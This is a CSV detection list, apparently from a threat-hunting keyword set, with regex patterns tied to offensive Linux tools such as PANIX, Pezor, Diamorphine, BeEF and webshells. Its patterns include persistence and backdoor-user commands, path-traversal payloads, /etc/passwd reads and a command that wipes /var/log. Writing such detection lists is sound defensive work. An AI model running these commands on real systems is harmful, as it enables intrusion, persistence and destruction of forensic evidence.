"*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*./test/nmap*/*.nse*",".{0,1000}\.\/test\/nmap.{0,1000}\/.{0,1000}\.nse.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","#linux","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*./tunwg --*",".{0,1000}\.\/tunwg\s\-\-.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#linux","N/A","10","10","226","9","2024-09-18T15:03:45Z","2023-01-16T17:51:13Z"
"*./update-beef*",".{0,1000}\.\/update\-beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","9901","2189","2024-12-04T13:45:21Z","2011-11-23T06:53:25Z"
"*./Vegile*",".{0,1000}\.\/Vegile.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","714","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z"
"*./wiretap remove*",".{0,1000}\.\/wiretap\sremove.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#linux","N/A","10","9","861","38","2024-11-26T00:33:13Z","2022-11-19T00:19:05Z"
"*./xhydra*",".{0,1000}\.\/xhydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","9820","2040","2024-08-13T06:27:39Z","2014-04-24T14:45:37Z"
"*./xrkRce *",".{0,1000}\.\/xrkRce\s.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","0","#linux","N/A","N/A","5","485","196","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z"
"*./zabbix.py*",".{0,1000}\.\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pykiller/CVE-2022-23131","1","1","#linux","N/A","N/A","1","2","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z"
"*./zexp check -*",".{0,1000}\.\/zexp\scheck\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","#linux","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z"
"*.bashrc persistence setup successfully*",".{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","306","39","2024-08-29T12:55:39Z","2023-05-30T02:30:47Z"
"*cp /etc/passwd*",".{0,1000}cp\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*.server_DoElevationRequest((Get-NtProcess -ProcessId $pid)*""cmd.exe""*C:\""*",".{0,1000}\.server_DoElevationRequest\(\(Get\-NtProcess\s\-ProcessId\s\$pid\).{0,1000}\""cmd\.exe\"".{0,1000}C\:\\\"".{0,1000}","greyware_tool_keyword","sudo","sudo on windows allowing privilege escalation","T1068 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://www.tiraniddo.dev/2024/02/sudo-on-windows-quick-rundown.html","1","0","#linux","N/A","7","8","N/A","N/A","N/A","N/A"
"*.sh *--checksec*",".{0,1000}\.sh\s.{0,1000}\-\-checksec.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*.sh *cvelist-file:*",".{0,1000}\.sh\s.{0,1000}cvelist\-file\:.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*.sh --at --custom --command * --time *",".{0,1000}\.sh\s\-\-at\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-time\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --authorized-keys --custom --key *.ssh/authorized_keys*",".{0,1000}\.sh\s\-\-authorized\-keys\s\-\-custom\s\-\-key\s.{0,1000}\.ssh\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --backdoor-user --username *",".{0,1000}\.sh\s\-\-backdoor\-user\s\-\-username\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --cron --custom --command * --crond --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crond\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --cron --custom --command * --crontab*",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crontab.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --cron --custom --command * --daily --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-daily\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh -format=bof *.exe*",".{0,1000}\.sh\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*.sh -format=service-dll *",".{0,1000}\.sh\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*.sh -format=service-exe *",".{0,1000}\.sh\s\-format\=service\-exe\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*cut -d: -f1 /etc/passwd*",".{0,1000}cut\s\-d\:\s\-f1\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cut","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*.sh --shell-profile --custom --command * --path */.bash_profile*",".{0,1000}\.sh\s\-\-shell\-profile\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/\.bash_profile.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --systemd --custom --command *",".{0,1000}\.sh\s\-\-systemd\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --systemd --default --ip * --port *",".{0,1000}\.sh\s\-\-systemd\s\-\-default\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --udev --custom --command *",".{0,1000}\.sh\s\-\-udev\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh --xdg --custom --command * --path */etc/xdg/autostart/*",".{0,1000}\.sh\s\-\-xdg\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/etc\/xdg\/autostart\/.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*.sh -xorkey=*",".{0,1000}\.sh\s\-xorkey\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*\diamorphine.c*",".{0,1000}\\diamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/../../../../../../../../../../../../../../etc/apache/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/apache\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../etc/http/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/http\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../etc/http/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/http\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../etc/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../etc/httpd/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../usr/apache/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/apache\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/local\/etc\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/usr\/local\/etc\/httpd\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/opt\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/private\/etc\/httpd\/httpd\.conf\.default.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/Volumes\/webBackup\/private\/etc\/httpd\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/../../../../../boot.ini*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/boot\.ini.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","5977","1385","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z"
"*\diamorphine.h*",".{0,1000}\\diamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*",".{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"* /var/log -type f -exec */tr* -s 0 {} \*",".{0,1000}\/\?\?\?\/\?\?\?\/f\?n\?\s\/var\/log\s\-type\sf\s\-exec\s\/\?\?\?\/\?\?\?\/tr\?\?\?\?\?e\s\-s\s0\s\{\}\s\\.{0,1000}","greyware_tool_keyword","find","truncate every file under /var/log to size 0 - no log content = no forensic.","T1486 - T1553 - T1592.002 - T1081","TA0005 - TA0007 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*",".{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/app/bin/merlinAgent*",".{0,1000}\/app\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","186","57","2024-10-14T13:04:00Z","2020-07-17T20:47:56Z"
"*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*",".{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*/AthenaPlugins/bin/*",".{0,1000}\/AthenaPlugins\/bin\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","#linux","N/A","10","10","180","38","2024-12-06T04:53:19Z","2022-01-24T20:44:38Z"
